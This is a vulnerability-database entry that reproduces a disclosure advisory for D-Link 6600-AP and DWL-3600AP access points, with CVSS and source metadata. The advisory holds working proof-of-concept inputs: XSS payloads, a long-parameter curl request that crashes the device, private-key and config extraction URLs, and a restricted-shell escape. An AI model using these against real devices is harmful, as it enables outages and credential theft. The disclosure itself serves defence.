7 vulnerabilities found for dwl-3600ap by dlink
VAR-201908-0911
Vulnerability from variot - Updated: 2024-11-23 21:52
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. The D-Link 6600-AP and DWL-3600AP devices contain an input validation vulnerability. The device may be put into a service interruption (DoS) state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot.
# Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is no longer produced, but support is still provided by D-Link, as described on the D-Link website. Note that this product is built for business customers of D-Link, and we can expect thousands of devices to be at risk. The code base is shared with DWL-3600AP and DWL-8610AP.
This advisory was sent to D-Link on 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP. Vulnerability number 2 also affects DWL-8610AP.
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof of concept
Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>
Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>
2. Post-authenticated Certificate and RSA Private Key extraction through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
 -s Spider mode - only check file existence
 -c Continue retrieval of aborted transfer
 -q Quiet
 -P DIR Save to DIR (default .)
 -T SEC Network read timeout is SEC seconds
 -O FILE Save to FILE ('-' for stdout)
 -U STR Use STR for User-Agent header
 -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0911",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14333",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14333",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29140",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "VHN-146269",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14333",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-14333",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14333",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14333",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29140",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1639",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146269",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. 
\nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. 
Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. 
\n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14333"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2019-14333",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29140",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146269",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"id": "VAR-201908-0911",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
}
],
"trust": 1.3903846
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
}
]
},
"last_update_date": "2024-11-23T21:52:00.729000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP Denial of Service Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177599"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95748"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14333"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146269"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"date": "2019-08-01T13:15:14.023000",
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-146269"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"date": "2024-11-21T04:26:31.713000",
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Vulnerability related to input validation on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
],
"trust": 0.6
}
}
VAR-201908-0915
Vulnerability from variot - Updated: 2024-11-23 21:52
